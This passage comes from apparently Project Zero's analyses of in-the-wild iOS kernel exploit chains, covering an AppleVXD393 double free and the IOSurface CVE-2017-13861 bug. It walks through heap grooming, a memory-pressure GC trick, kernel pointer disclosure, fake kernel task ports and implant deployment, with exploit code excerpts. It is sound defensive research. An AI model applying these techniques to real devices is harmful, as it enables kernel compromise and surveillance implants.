    v7 = (VXD_DEALLOC **)(this + 0x268); // head
  *v7 = prev;
  IOFree(VXD_desc, 0x38LL);
  return err;
}

__int64 __fastcall AppleVXD393::deallocateKernelMemory(__int64 this, VXD_DEALLOC *VXD_desc)
{
  __int64 err; // x19

  lck_mtx_lock(*(_QWORD *)(this + 0xD8));
  err = AppleVXD393::deallocateKernelMemoryInternal((AppleVXD393 *)this, VXD_desc);
  *(_DWORD *)(this + 0x2628) = 1;
  lck_mtx_unlock(*(_QWORD *)(this + 0xD8));
  return err;
}

AppleVXD393::deallocateKernelMemoryInternal(AppleVXD393 *this, VXD_DEALLOC *VXD_desc) {
  if ( !VXD_desc->iomemdesc ) {
    SMDLog("AppleVXD393::deallocateKernelMemory pKernelMemInfo->xfer NULL\n");
    return 0xE00002C2;
  }
  ...
}
In a slightly obfuscated way this is reading a pointer from the VXDUserClient object which points to a 0x38-byte structure which I've tried to recreate here:

0x38 byte struct structure {
  // virtual method will be called if size_in_pages non-zero
  +0  = IOMemoryDescriptor ptr
  // virtual release method will be called if non-zero
  +8  = another OS_object
  +10 = unk
  +18 = size_in_pages
  +20 = maptype
  +28 = prev_ptr
  +30 = next_ptr
}
A pointer to such a structure gets passed to AppleVXD393::deallocateKernelMemory, which in turn calls AppleVXD393::deallocateKernelMemoryInternal. If the first member (which is supposed to be an IOMemoryDescriptor pointer) is NULL, then this will just return. Then in AppleVXD393UserClient::DeallocateMemory the structure will be unlinked from a doubly-linked list (with a notable lack of safe unlinking), before being free'd via IOFree.
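For comparison, this is roughly what safe unlinking looks like. It's a generic sketch with hypothetical names (`struct node`, `safe_unlink`) over a conventional head-pointer list, not a reconstruction of the driver's list: before touching any neighbour it checks that the neighbours really point back at the node being removed.

```c
#include <assert.h>
#include <stddef.h>

struct node {
    struct node *prev;
    struct node *next;
};

/*
 * Removes n from the list rooted at *head.
 * Returns 0 on success, or -1 if the links around n are inconsistent
 * (corrupted, forged, or n was already unlinked).
 */
int safe_unlink(struct node **head, struct node *n)
{
    assert(head != NULL && n != NULL);

    /* Whatever precedes n must point forward to n. */
    if (n->prev != NULL) {
        if (n->prev->next != n)
            return -1;
    } else if (*head != n) {
        return -1;
    }

    /* Whatever follows n must point back to n. */
    if (n->next != NULL && n->next->prev != n)
        return -1;

    if (n->prev != NULL)
        n->prev->next = n->next;
    else
        *head = n->next;
    if (n->next != NULL)
        n->next->prev = n->prev;

    n->prev = n->next = NULL;
    return 0;
}
```

With checks like these, unlinking the same node twice fails on the second attempt, and so does unlinking an entry whose prev and next were filled in by someone other than the list code.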

Nothing ever clears out the pointer at +0x290 in the VXDUserClient, which is the pointer to this 0x38 byte structure. So if the external method is called multiple times the same pointer will be passed to ::deallocateKernelMemory and then IOFree each time. This is the vulnerability which the exploit targets.
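The pattern is easy to model in userspace. In the sketch below every name is hypothetical and `toy_free` just counts calls instead of freeing, so the repeated free can be observed without undefined behaviour. The "fixed" variant shows one obvious way to avoid the problem; I'm not claiming it is how Apple patched the driver.

```c
#include <assert.h>
#include <stddef.h>

/* Stand-in for the 0x38-byte structure; free_count records toy_free calls. */
struct toy_desc {
    void *iomemdesc;
    struct toy_desc *prev;
    struct toy_desc *next;
    int free_count;
};

/* Stand-in for the userclient, which stores the pointer at +0x290. */
struct toy_client {
    struct toy_desc *desc;
};

/* Records the free instead of performing it. */
static void toy_free(struct toy_desc *d)
{
    d->free_count++;
}

/* Mirrors the vulnerable flow: free, but leave the pointer in place. */
void destroy_decoder_buggy(struct toy_client *c)
{
    assert(c != NULL);
    if (c->desc == NULL)
        return;
    toy_free(c->desc);
}

/* One possible fix: clear the pointer so a second call has nothing to free. */
void destroy_decoder_fixed(struct toy_client *c)
{
    assert(c != NULL);
    if (c->desc == NULL)
        return;
    toy_free(c->desc);
    c->desc = NULL;
}
```

Calling the buggy variant twice on the same client records two frees of the same structure; calling the fixed variant twice records one.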
Kernel Exploitation

Note that there are some restrictions on triggering the repeated free safely; specifically if the first pointer value isn't NULL and the size_in_pages field is non-zero, then a virtual method will be called on the IOMemoryDescriptor.
Also the entry will be unlinked from a list each time it's deallocated, so the prev and next pointers need to be set appropriately to survive that. (NULL is an appropriate, safe value.)

The attackers begin as usual by increasing the open file descriptor limit and creating 0x800 pipes. They also allocate 1024 early ports and an IOSurface. This time the IOSurface will be used as it was in iOS Exploit Chain 1 as a way to groom OSObjects.

They allocate four mach ports (receive one through four) then force a zone GC.
defeating mach_zone_force_gc removal mitigation

Apple completely removed the mach_zone_force_gc host port MIG method so there is now no direct way to immediately force a zone GC.
Zone GCs are still a required feature however; one just has to get a bit more creative. Zone GCs will still occur under memory pressure, so to cause a zone GC, just cause memory pressure. Here's how they do it:

#include <stdint.h>
#include <unistd.h>
#include <sys/mman.h>
#include <mach/mach.h>

#define ROUND_DOWN_NEAREST_1MB_BOUNDARY(val) (((val) >> 20) << 20)

uint32_t n_actually_free_pages(void);

void force_GC()
{
  long page_size = sysconf(_SC_PAGESIZE);
  uint32_t target_page_cnt = n_actually_free_pages();

  size_t fifty_mb = 1024*1024*50;

  // ask for everything that is currently free, plus 50MB
  size_t bytes_size = (target_page_cnt * page_size) + fifty_mb;
  bytes_size = ROUND_DOWN_NEAREST_1MB_BOUNDARY(bytes_size);

  char* base = mmap(0,
                    bytes_size,
                    PROT_READ | PROT_WRITE,
                    MAP_ANON | MAP_PRIVATE,
                    -1,
                    0);
  if (!base || base == MAP_FAILED) {
    return;
  }

  for (size_t i = 0; i < bytes_size / page_size; ++i ) {
    // touch each page
    base[page_size * i] = i;
  }
  n_actually_free_pages();

  // wait for GC...
  sleep(1);

  // remove memory pressure
  munmap(base, bytes_size);
}

uint32_t n_actually_free_pages(void)
{
  struct vm_statistics64 stats = {0};
  mach_msg_type_number_t statsCnt = HOST_VM_INFO64_COUNT;

  host_statistics64(mach_host_self(),
                    HOST_VM_INFO64,
                    (host_info64_t)&stats,
                    &statsCnt);

  return (stats.free_count - stats.speculative_count);
}
This is significantly slower than the previous version, but does work. They will continue to use this method for the remaining chains.
Heap grooming

To the fourth port they send two kalloc_groomer messages using the familiar functions; one making 0x20000 kalloc(0x38) calls and one making 0x2000 4k kallocs. These are filling in any holes in the heap to ensure subsequent allocations from those zones are more likely to come from fresh pages.
They perform a mach port groom allocating 10240 before_ports, a target port then 5120 after_ports. This sets up a situation similar to the IOSurface exploit in iOS Exploit Chain 2, where they have a single target port in the middle of a large number of other port allocations all owned by the exploit process:

They send the target port in an out-of-line ports descriptor to third port; stashing a reference there (meaning target_port now has a reference count of 2.) This is again similar to the technique used in the IOSurface exploit.

They call external method 0 on the userclient. This is CreateDecoder, which will cause the allocation of the 0x38 byte target buffer, storing the pointer in the userclient at +0x290.

They then call external method 1, DestroyDecoder. This kfree's the 0x38 byte structure which was just allocated, but doesn't NULL out the pointer to it in the userclient at +0x290.

They use the IOSurface property trick to deserialize an OSArray of 0x400 OSData objects, where each OSData object is a 0x38-byte buffer of zeros. It's attached to the IOSurfaceRootUserClient with the key "spray_56" (where 56 is 0x38 in decimal, the size of the target allocation.)

The idea here is that one of those OSData object's backing buffers was allocated over the free'd 0x38-byte structure allocation which the UserClient still has a dangling pointer to. Since they set the contents to NULL, it will survive being destroyed by the userclient again, which is exactly what happens when they call DestroyDecoder a second time:

IOConnectCallStructMethod(
         userclient_connection,
         1LL, // AppleVXD393UserClient::DestroyDecoder
              // free one of the OSData objects
         IOConnect_struct_in_buf,
         struct_in_size,
         IOConnect_struct_out_buf,
         &struct_out_size);

At this point both the VXD393UserClient and the OSData object have dangling pointers to a free'd allocation. They reallocate the buffer for a second time, but this time with something different:

// send 7 ports; will result in a 0x38 byte kalloc alloc
bzero(ool_ports_desc, 28LL);
ool_ports_desc[1] = target_port;
send_a_mach_message_with_ool_ports_descs(
    second_receive,
    ool_ports_desc,
    7,
    0x190);
This time they're sending a mach message with 0x190 OOL_PORTS descriptors, each with 7 port names, all of which are MACH_PORT_NULL apart from the second one. As we saw in the IOSurface exploit, this will result in a 0x38-byte kalloc allocation (0x38 = 7*0x8) where the second qword is a pointer to target_port's struct ipc_port:
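The two sizes involved (28 bytes zeroed in userspace, 0x38 bytes allocated in the kernel) follow from the element widths. A minimal sketch of the resulting buffer, assuming 32-bit port names in userspace and 64-bit pointers in the kernel; `model_ool_ports_buffer` is a hypothetical helper and any address passed to it is just a placeholder:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define OOL_PORT_COUNT 7

enum {
    /* 7 port names of 4 bytes each: the 28 bytes zeroed with bzero */
    USER_NAMES_SIZE  = OOL_PORT_COUNT * sizeof(uint32_t),
    /* 7 kernel pointers of 8 bytes each: the 0x38-byte kalloc allocation */
    KERNEL_PTRS_SIZE = OOL_PORT_COUNT * sizeof(uint64_t)
};

/*
 * Fills out[] the way the copied-in descriptor buffer is described above:
 * every slot NULL except the second, which holds the address of the port.
 */
void model_ool_ports_buffer(uint64_t out[OOL_PORT_COUNT],
                            uint64_t target_port_kaddr)
{
    assert(out != NULL);
    memset(out, 0, KERNEL_PTRS_SIZE);
    out[1] = target_port_kaddr;
}
```

The point of choosing 7 names is that the kernel-side array lands in the same allocation size as the freed 0x38-byte structure, with the only non-zero qword at offset +8, leaving the first qword and the qwords at +0x28 and +0x30 zero.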

pointer disclosure

Hopefully one of those 0x190 out-of-line ports descriptors overlapped both the OSData backing buffer and the VXD393UserClient 0x38-byte structure buffer.

Now they read the contents of all the OSData buffers via the IOSurface read property method and look for a kernel pointer (remember, the contents of all of the OSData buffers were originally all zeros):

iosurface_get_property_wrapper(spray_56_str,
                               big_buffer,
                               &buffer_size_in_out);
found_at = memmem(big_buffer, buffer_size_in_out, "\xFF\xFF\xFF", 3);
The "\xFF\xFF\xFF" signature will match the upper three bytes of a kernel pointer. The only kernel pointer which will have been serialized is the address of target_port, meaning they've successfully disclosed the kernel address of the target port.
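A slightly stricter version of the same search is sketched below. It's my variation rather than what the exploit does: instead of a raw three-byte search it walks the buffer in 8-byte steps and checks the top three bytes of each little-endian qword, which assumes the pointer sits at an 8-byte-aligned offset in the returned data.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Returns the byte offset of the first 8-byte-aligned qword whose three
 * most significant bytes are all 0xff, or -1 if none is found.
 * Qwords are treated as little-endian, so those bytes are at +5, +6, +7.
 */
long find_kernel_pointer(const uint8_t *buf, size_t len)
{
    assert(buf != NULL);

    for (size_t off = 0; off + 8 <= len; off += 8) {
        if (buf[off + 5] == 0xff &&
            buf[off + 6] == 0xff &&
            buf[off + 7] == 0xff) {
            return (long)off;
        }
    }
    return -1;
}
```

Against a buffer of zeroed 0x38-byte chunks where one chunk has had a kernel pointer written to its second qword, this returns the offset of that qword. On data that is otherwise all zeros the simple memmem search is just as good, which is presumably why the attackers didn't bother with anything more careful.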
Repeated free to extra port reference drop

They trigger the bug for a third time, leaving themselves with three dangling pointers: one in the userclient, one in an OSData object, and one in an out-of-line ports descriptor port pointer buffer in an in-transit mach message.
Note that it's still safe to trigger the bug as only the second qword is non-zero. The first pointer (an IOMemoryDescriptor*) is still NULL, so AppleVXD393::deallocateKernelMemoryInternal will return early, and the list unlinking will succeed because both the prev and next pointers are NULL.
Third replacement

They serialize another array of OSData objects. This time they place two copies of the disclosed target port kernel address in the buffer before attaching them to the IOSurfaceUserClient again:

os_data_spray_buf_ptr[0] = target_port_kaddr;
os_data_spray_buf_ptr[1] = target_port_kaddr;
serialize_array_of_data_buffers(&another_vec, os_data_spray_buf, 0x38u, 800);
What's going on there?

As we've seen in previous chains, each port pointer in an in-transit out-of-line ports descriptor holds a reference; you can see the logic for this in ipc_kmsg_copyin_ool_ports_descriptor in ipc_kmsg.c in the XNU source.

The "real" out-of-line ports descriptor buffer for the message which was sent only had one pointer to a port; so it only took one reference on the port. But they've now doubled-up that pointer; the descriptor buffer has two copies of it, but it only took one extra reference.

When the descriptor buffer is destroyed (for example, when the port to which it was sent is destroyed without the message being received) the kernel will iterate through each pointer in the descriptor and if it isn't NULL, it will drop a reference:

ipc_kmsg_clean_body(...
...
  case MACH_MSG_OOL_PORTS_DESCRIPTOR : {
    ipc_object_t* objects;
    mach_msg_type_number_t j;
    mach_msg_ool_ports_descriptor_t* dsc;

    dsc = (mach_msg_ool_ports_descriptor_t*)&saddr->ool_ports;
    objects = (ipc_object_t *) dsc->address;

    if (dsc->count == 0) {
      break;
    }

    /* destroy port rights carried in the message */

    for (j = 0; j < dsc->count; j++) {
      ipc_object_t object = objects[j];

      if (!IO_VALID(object))
        continue;

      // drop a reference
      ipc_object_destroy(object, dsc->disposition);
    }

    /* destroy memory carried in the message */
    kfree(dsc->address, (vm_size_t) dsc->count * sizeof(mach_port_t));
That's exactly what happens next when they destroy the port to which the OOL_PORTS descriptors were sent:

  mach_port_destroy(mach_task_self(), second_receive);
This has the effect of dropping an extra reference on target_port, in this case leaving two pointers to target_port (one in the task's port name space table, one in the out-of-line ports descriptor sent to third_receive) but only one reference.
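The accounting can be replayed with a toy model. Everything here is hypothetical (`struct toy_port`, `toy_clean_ool_ports`), and it models a single seven-slot descriptor buffer rather than all 0x190 of them: the overlapped buffer took one reference when it was sent, but by the time it is cleaned up it contains two copies of the pointer.

```c
#include <assert.h>
#include <stddef.h>

/* Stand-in for struct ipc_port; only the reference count matters here. */
struct toy_port {
    int refs;
};

/*
 * Mirrors the loop in ipc_kmsg_clean_body: one reference is dropped for
 * every non-NULL slot, regardless of how many were taken at copy-in.
 */
void toy_clean_ool_ports(struct toy_port **slots, size_t count)
{
    assert(slots != NULL);

    for (size_t j = 0; j < count; j++) {
        if (slots[j] == NULL)
            continue;
        slots[j]->refs--;
    }
}
```

Start the port at three references (the task's name space entry, the descriptor stashed on the third port, and the one descriptor modelled here), fill the first two slots with the same pointer as the third replacement does, and run the cleanup: the count drops to one while two legitimate pointers to the port remain.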

They've now recreated the same situation they had in the IOSurface exploit: about to give themselves a dangling mach port pointer, but from a quite different initial primitive. In that case the bug itself directly gave them a dangling pointer to a mach port structure; here they've recreated that same primitive starting from a repeated-free bug in a different zone; something quite different.

We'll now see that the rest of the code matches up very closely with the IOSurface exploit. This is an example of marginal costs; the cost to develop each additional exploit chain is lower than the cost for the first one. Many parts can be reused; mitigations must only be defeated once upon introduction (or new techniques developed if the mitigation was not in a critical path.)
Joining the chains

The code from this point is almost completely copy-pasted from the IOSurface exploit.
They destroy the before_ports, third_receive (causing target_port to be freed) then after_ports and perform a GC with the new method. At this point, target_port is dangling, and the zone chunk it's in is ready to be reallocated by a different zone.

They attempt to replace with small out-of-line memory regions which will correspond to kalloc.4096 allocations, overlapping the ip_context field with a marker containing the loop iteration.

Each time through the loop they check whether the context field changed, meaning the ipc_port buffer was reallocated as the out-of-line memory descriptor backing buffer. They free the particular port to which the correct descriptor was sent, and try to reallocate with 0x800 pipe buffers, each filled with fake ports with a context value set to identify which fd it maps to.

Once this is identified they build a fake IKOT_CLOCK port and brute force the KASLR slide, then using the offsets they build their initial fake task port for a read.

They use a more optimized approach to build a fake kernel task this time; given the offset to the kernel_task pointer they use the bootstrap read to get a pointer to the kernel task, from which they read a pointer to the kernel task port and a pointer to the kernel's vm_map.

From the kernel task port they read the field at offset +0x60, which is the port's space, in this case itk_space_kernel.

This is all that's required to build a fake kernel task port and fake kernel task in the pipe buffer, giving them kernel memory read and write.
Post-exploitation

The post exploitation phase remains the same; patching the platform policy to allow execution from /tmp, adding the implant's CDHash to the kernel trust cache, replacing credentials to temporarily escape the sandbox and posix_spawn the implant as root, then switching back to the original credentials.
They place the string iop114 in the bootargs, which we saw that they read right at the start of the privilege escalation exploit to determine whether the exploit successfully ran already.
Appendix A

List of unused but resolved symbols

asl_log_message
sel_registerName
CFArrayCreateMutable
CFDataCreate
CFArrayAppendValue
CFDictionaryCreate
CFDictionaryAddValue
CFStringCreateWithFormat
CFRelease
CFDataGetBytePtr
CFDataGetLength
bootstrap_look_up2
stat
usleep
open
CFWriteStreamCreateWithFTPURL
CFWriteStreamOpen
CFWriteStreamWrite
CFWriteStreamClose
unlink
sprintf
strcat
copyfile
removefile
task_suspend
task_name_for_pid
mach_port_mod_refs
pthread_create
pthread_join
_IOHIDCreateBinaryData
io_hideventsystem_open
mlock
mig_get_reply_port
mach_vm_read_overwrite
mach_ports_lookup
vm_allocate
mach_port_kobject
IOMasterPort
kCFTypeArrayCallBacks

There's some interesting stuff in here. It's of course impossible to know definitively if these were left over from development, or actually used in early exploits using this second framework. But the following two chains (iOS Exploit Chains 4 and 5) use this same symbol list, adding only the symbols they require.

The following symbols seem interesting; it's possible that these symbols were also used in ROP stacks in sandbox escapes as well.

mlock points to two possible things; it's been used in the past to ensure userspace pages don't get swapped while triggering a userspace dereference. mlock has also been involved in codesigning bypasses; potentially it was used in a ROP chain to bootstrap shellcode execution.
mach_port_kobject: this kernel MIG method is discussed at length in Stefan Esser's blog post "mach_port_kobject() and the kernel address obfuscation". Until iOS 6 it would return the ip_kobject field of the provided mach port. In iOS 6 some obfuscation was added to the returned pointer but, as Stefan pointed out, it was easy to break.
io_hideventsystem_open: there have been many bugs in HID drivers and also in the hideventsystem service itself. See for an exploit. Potentially this is related to IOHIDCreateBinaryData which they also import.

In-the-wild iOS Exploit Chain 2

30 August, 2019 - 02:04
Posted by Ian Beer, Project Zero


This was an exploit for a known bug class which I had been auditing for since late 2016. We'll see the same anti-pattern which led to this vulnerability again in Exploit Chain #3, which follows this post.

This exploit chain targets iOS 10.3 through 10.3.3. Interestingly, I also independently discovered and reported this vulnerability to Apple, and it was fixed in iOS 11.2. 

This also demonstrates that Project Zero’s work does collide with bugs being exploited in the wild.

In-the-wild iOS Exploit Chain 2 - IOSurface

targets: 5s through 7, 10.3 through 10.3.3 (vulnerability patched in 11.2)

iPhone6,1 (5s, N51AP)
iPhone6,2 (5s, N53AP)
iPhone7,1 (6 plus, N56AP)
iPhone7,2 (6, N61AP)
iPhone8,1 (6s, N71AP)
iPhone8,2 (6s plus, N66AP)
iPhone8,4 (SE, N69AP)
iPhone9,1 (7, D10AP)
iPhone9,2 (7 plus, D11AP)
iPhone9,3 (7, D101AP)
iPhone9,4 (7 plus, D111AP)

versions: (dates are release dates)

14E277 (10.3 - 27 Mar 2017)
14E304 (10.3.1 - 3 Apr 2017)
14F89 (10.3.2 - 15 May 2017)
14G60 (10.3.3 - 19 Jul 2017) <last version of iOS 10>

first unsupported version: 11.0 (19 Sep 2017)

This bug wasn't patched until iOS 11.2, but the attackers only supported iOS 10.3 through 10.3.3 (the last version of iOS 10). For iOS 11 they moved to a new chain.

The kernel vulnerability

The kernel bug used here is CVE-2017-13861, a bug collision with Project Zero issue 1417, aka async_wake. I independently discovered this vulnerability and reported it to Apple on October 30th 2017. The attackers appear to have ceased using this bug prior to me finding it; the first unsupported version is iOS 11, released 19 September 2017. The bug wasn't fixed until iOS 11.2 however (released December 2nd 2017).

The release of iOS 11 would have broken one of the exploitation techniques used by this exploit; specifically in iOS 11 the mach_zone_force_gc() kernel MIG method was removed. It's unclear why they moved to a completely new chain for iOS 11 (with a new trick for forcing GC after the removal of the method) rather than updating this chain.

The vulnerability

We saw in the first chain that IOKit external methods can be called via the IOConnectCallMethod function. There's another function you can call instead: IOConnectCallAsyncMethod, which takes an extra mach port and reference argument:

kern_return_t
IOConnectCallMethod(mach_port_t     connection,
                    uint32_t        selector,
                    const uint64_t* input,
                    uint32_t        inputCnt,
                    const void*     inputStruct,
                    size_t          inputStructCnt,
                    uint64_t*       output,
                    uint32_t*       outputCnt,
                    void*           outputStruct,
                    size_t*         outputStructCnt);

kern_return_t
IOConnectCallAsyncMethod(mach_port_t     connection,
                         uint32_t        selector,
                         mach_port_t     wake_port,
                         uint64_t*       reference,
                         uint32_t        referenceCnt,
                         const uint64_t* input,
                         uint32_t        inputCnt,
                         const void*     inputStruct,
                         size_t          inputStructCnt,
                         uint64_t*       output,
                         uint32_t*       outputCnt,
                         void*           outputStruct,
                         size_t*         outputStructCnt);
The intention is to allow drivers to send a notification message to the supplied mach port when an operation is completed (hence the "Async"(hronous) in the name.)

Since IOConnectCallAsyncMethod is a MIG method the lifetime of the wake_port argument will be subject to MIG's lifetime rules for mach ports.

MIG takes a reference on wake_port and calls the implementation of the MIG method (which will then call in to the IOKit driver's matching external method implementation.) The return value from the external method will be propagated up to the MIG level where the following rule will be applied:

If the return code is non-zero, indicating an error, then MIG will drop the reference it took on the wake_port. If the return code is zero, indicating success, then MIG will not drop the reference it took on wake_port, meaning the reference was transferred to the external method.

The bug was that IOSurfaceRootUserClient external method 17 (s_set_surface_notify) would drop a reference on the wake_port and then also return an error code if the client had previously registered a port with the same reference value. MIG would see that error code and drop a second reference on the wake_port when only one reference was taken. This led to the reference count being out-of-sync with the number of pointers to the port, leading to a use-after-free.
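The ownership rule and the double drop can be modelled in a few lines of plain C. This is a toy sketch rather than kernel code: toy_port, toy_userclient, toy_mig_call and toy_set_surface_notify are hypothetical names invented for illustration, and only the reference count is modelled.

```c
#include <assert.h>
#include <stddef.h>

/* Toy stand-in for a kernel port: only the reference count is modelled. */
typedef struct {
    int refs;
} toy_port;

/* Toy stand-in for the userclient: remembers a previously registered port. */
typedef struct {
    toy_port *registered;
} toy_userclient;

enum { TOY_SUCCESS = 0, TOY_ERROR = 1 };

/* Buggy external method: on the "already registered" path it drops a
 * reference on wake_port AND returns an error. */
int toy_set_surface_notify(toy_userclient *uc, toy_port *wake_port)
{
    if (uc->registered != NULL) {
        wake_port->refs--;      /* first drop: done by the driver itself */
        return TOY_ERROR;       /* the error code makes the caller drop again */
    }
    uc->registered = wake_port; /* success: the reference is kept by the driver */
    return TOY_SUCCESS;
}

/* MIG-style wrapper applying the ownership rule described above. */
int toy_mig_call(toy_userclient *uc, toy_port *wake_port)
{
    wake_port->refs++;                       /* MIG takes one reference */
    int kr = toy_set_surface_notify(uc, wake_port);
    if (kr != TOY_SUCCESS)
        wake_port->refs--;                   /* error: MIG drops its reference */
    return kr;
}

/* Returns the reference count after calling the method twice on a port
 * that starts with initial_refs references. */
int toy_refs_after_two_calls(int initial_refs)
{
    toy_port port = { initial_refs };
    toy_userclient uc = { NULL };
    toy_mig_call(&uc, &port);   /* first call succeeds: +1 */
    toy_mig_call(&uc, &port);   /* second call fails: +1, then -2 */
    return port.refs;
}
```

Starting from two references, the model ends with two references even though the userclient now also holds a pointer, which is the mismatch between pointers and references that the exploit relies on.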

Again, this is directly reachable from inside the MobileSafari renderer sandbox due to this line in the sandbox profile:

(allow iokit-open
       (iokit-user-client-class "IOSurfaceRootUserClient")

Setup

This exploit also relies on the system loader to resolve symbols. It uses the same code as Exploit Chain #1 to terminate all other threads in the current task. Before continuing on however, this exploit first tries to detect whether this device has already been exploited. It reads the kern.bootargs sysctl variable, and if the bootargs contains the string "iop1" then the thread goes into an infinite loop. At the end of the exploit we'll see them using the kernel memory read/write primitive they build to add the "iop1" string to the bootargs.

They use the same serialized NSDictionary technique to check whether this device and kernel version combination is supported and to get the necessary offsets.

Exploitation

They call setrlimit with the RLIMIT_NOFILE resource parameter to increase the open file limit to 0x2000. They then create 0x800 pipes, saving the read and write end file descriptors. iOS has a low default limit on the number of open file descriptors, hence the call to setrlimit.
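As a rough illustration of this setup step, here is a minimal POSIX sketch that raises the soft file descriptor limit and then creates a batch of pipes. The helper names (raise_fd_limit, create_pipes, close_pipes) are my own, and clamping to the hard limit is an assumption added so the code behaves sensibly on any system; the read end is stored at index 2*i and the write end at 2*i + 1.

```c
#include <assert.h>
#include <sys/resource.h>
#include <unistd.h>

/* Raise the soft RLIMIT_NOFILE towards `wanted`, clamped to the hard limit.
 * Never lowers an existing limit. Returns the soft limit now in effect,
 * or 0 on error. */
rlim_t raise_fd_limit(rlim_t wanted)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_NOFILE, &rl) != 0)
        return 0;
    if (rl.rlim_cur >= wanted)
        return rl.rlim_cur;
    rlim_t target = wanted;
    if (rl.rlim_max != RLIM_INFINITY && target > rl.rlim_max)
        target = rl.rlim_max;
    rl.rlim_cur = target;
    if (setrlimit(RLIMIT_NOFILE, &rl) != 0)
        return 0;
    return rl.rlim_cur;
}

/* Create up to n pipes. fds must have room for 2*n descriptors.
 * Returns the number of pipes actually created. */
int create_pipes(int *fds, int n)
{
    int created = 0;
    while (created < n && pipe(&fds[2 * created]) == 0)
        created++;
    return created;
}

/* Close both ends of the first n pipes in fds. */
void close_pipes(const int *fds, int n)
{
    for (int i = 0; i < 2 * n; i++)
        close(fds[i]);
}
```

With the values from the text this would be raise_fd_limit(0x2000) followed by create_pipes(fds, 0x800), which needs 0x1000 descriptors and so fits under the raised limit.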
They create an IOSurfaceRootUserClient connection; this time just used to trigger the bug rather than for storing property objects.

They call mach_zone_force_gc(), indicating that their initial resource setup is complete and they're going to start the heap groom.
Kernel Zone allocator garbage collection

This exploit introduces a new technique involving the mach_zone_force_gc host port method. In the first chain we saw the use of the kernel kalloc function for allocating kernel heap memory. The word heap is used here with its generic meaning of "area used for scratch memory"; it has nothing to do with the classical heap data structure. The memory returned by kalloc is actually from a zone allocator called zalloc.

The kernel reserves a fixed-size region of its virtual address space for the kernel zone allocator and defines a number of named zones. The virtual memory region is then split up into chunks as zones grow based on dynamic memory allocation patterns. All zones return allocations of fixed sizes.

The kalloc function is a wrapper around a number of general-purpose fixed-sized zones such as kalloc.512, kalloc.6144 and so on. The kalloc wrapper function chooses the smallest kalloc.XXX zone size which will fit the requested allocation, then asks the zone allocator to return a new allocation from that zone. In addition to kalloc zones, many kernel subsystems also define their own special purpose zones. The kernel structures representing mach ports for example are always allocated from their own zone called ipc.ports. This is not intended to be a security mitigation (ala PartitionAlloc or GigaCage) but it does mean that an attacker has to take a few extra steps to build generic use-after-free exploits. 
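The size-class selection described above can be sketched as follows. The table of zone sizes is purely illustrative (the real set of kalloc zones differs between kernel versions), and toy_kalloc_zone_for is a hypothetical name.

```c
#include <assert.h>
#include <stddef.h>

/* Illustrative zone element sizes only; not the real kernel table. */
static const size_t toy_kalloc_zones[] = {
    16, 32, 64, 128, 256, 512, 1024, 2048, 4096, 6144, 8192
};

/* Returns the element size of the smallest zone that fits `size`,
 * or 0 if the request is larger than every zone in the table. */
size_t toy_kalloc_zone_for(size_t size)
{
    size_t n = sizeof(toy_kalloc_zones) / sizeof(toy_kalloc_zones[0]);
    for (size_t i = 0; i < n; i++) {
        if (size <= toy_kalloc_zones[i])
            return toy_kalloc_zones[i];
    }
    return 0;
}
```

Under this model a 4095 byte request, like the pipe writes later in the post, is served from the 4096 byte zone.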

Over time zalloc zones can become fragmented. When there's memory pressure the zone allocator can perform a garbage collection. This has nothing to do with garbage collection in managed languages like Java; the meaning here is much simpler: a zone GC operation involves finding zone chunks which consist of completely free allocations. Such chunks are removed from the particular zone (e.g. kalloc.4096) and made available to all zones again.
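A toy model makes the "completely free" condition concrete. The types and the four-element chunk size below are invented for illustration and say nothing about how XNU actually tracks chunks; the point is only that a single live element keeps the whole chunk in its zone.

```c
#include <assert.h>
#include <stddef.h>

#define TOY_ELEMS_PER_CHUNK 4

typedef struct {
    int owner_zone;                   /* -1 means "not assigned to any zone" */
    int in_use[TOY_ELEMS_PER_CHUNK];  /* 1 if the element is allocated */
} toy_chunk;

/* Hand back every chunk whose elements are all free. Returns the number of
 * chunks released to the shared pool. */
int toy_zone_gc(toy_chunk *chunks, size_t n_chunks)
{
    int reclaimed = 0;
    for (size_t c = 0; c < n_chunks; c++) {
        if (chunks[c].owner_zone < 0)
            continue;                 /* already unassigned */
        int live = 0;
        for (int e = 0; e < TOY_ELEMS_PER_CHUNK; e++)
            live += chunks[c].in_use[e];
        if (live == 0) {
            chunks[c].owner_zone = -1;  /* now reusable by any zone */
            reclaimed++;
        }
    }
    return reclaimed;
}
```

In this model a chunk with even one stray allocation is never reclaimed, which is why an unrelated allocation landing in the groomed chunk would defeat the technique.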

Prior to iOS 11 it was possible to force such a zone garbage collection to occur by calling the mach_zone_force_gc() host port MIG method. Forcing a zone GC is a very useful primitive as it allows a bug involving objects from one zone to be exploited using objects from another. This technique will be used in all subsequent kernel exploits we'll look at.

Let's return to the exploit. They allocate two sets of ports:

  Set 1: 1200 ports
  Set 2: 1024 ports
As we saw in the first chain, they're going to make use of mach message out-of-line memory descriptors for heap grooming. They make minor changes to the function itself but the principle remains the same: to make controlled-size kalloc allocations, the lifetimes of which are tied to particular mach ports. They call send_kalloc_reserver:

  send_kalloc_reserver(v124, 4096, 0, 2560, 1);
This sends a mach message to port v124 with 2560 out-of-line descriptors, each of which causes a kalloc.4096 zone allocation. The contents of the memory aren't important here; initially they're just trying to fill in any holes in the kalloc.4096 zone.

Port groom

We've seen that the vulnerability involves mach ports, so we expect to see some heap grooming involving mach ports, which is what happens next. They allocate four more large groups of ports which I've named ports_3, ports_4, ports_5 and ports_6:

They allocate 10240 ports for the ports_3 group in a tight loop, then allocate a single mach port which we'll call target_port_1. They then allocate another 5120 ports for ports_4 in a second loop.

They're trying to force a heap layout like the following, where target_port_1 lies in an ipc_ports zone chunk where all the other ports in the chunk are from either ports_3 or ports_4. Note that due to the zone freelist mitigation introduced in iOS 9.2 there may be ports from both ports_3 and ports_4 before and after target_port_1:

They perform this same groom again, now with ports_5, then target_port_2, then ports_6:

They send a send right to target_port_1 in an out-of-line ports descriptor in a mach message. Out-of-line ports, like out-of-line memory regions, will crop up again and again so it's worth looking at them in detail.

Heap grooming technique: out of line ports

The descriptor structure used in a mach message for sending out-of-line ports is very similar to the structure used for sending out-of-line memory:

typedef struct {
  void*                      address;
  boolean_t                  deallocate: 8;
  mach_msg_copy_options_t    copy: 8;
  mach_msg_type_name_t       disposition : 8;
  mach_msg_descriptor_type_t type : 8;
  mach_msg_size_t            count;
} mach_msg_ool_ports_descriptor_t;
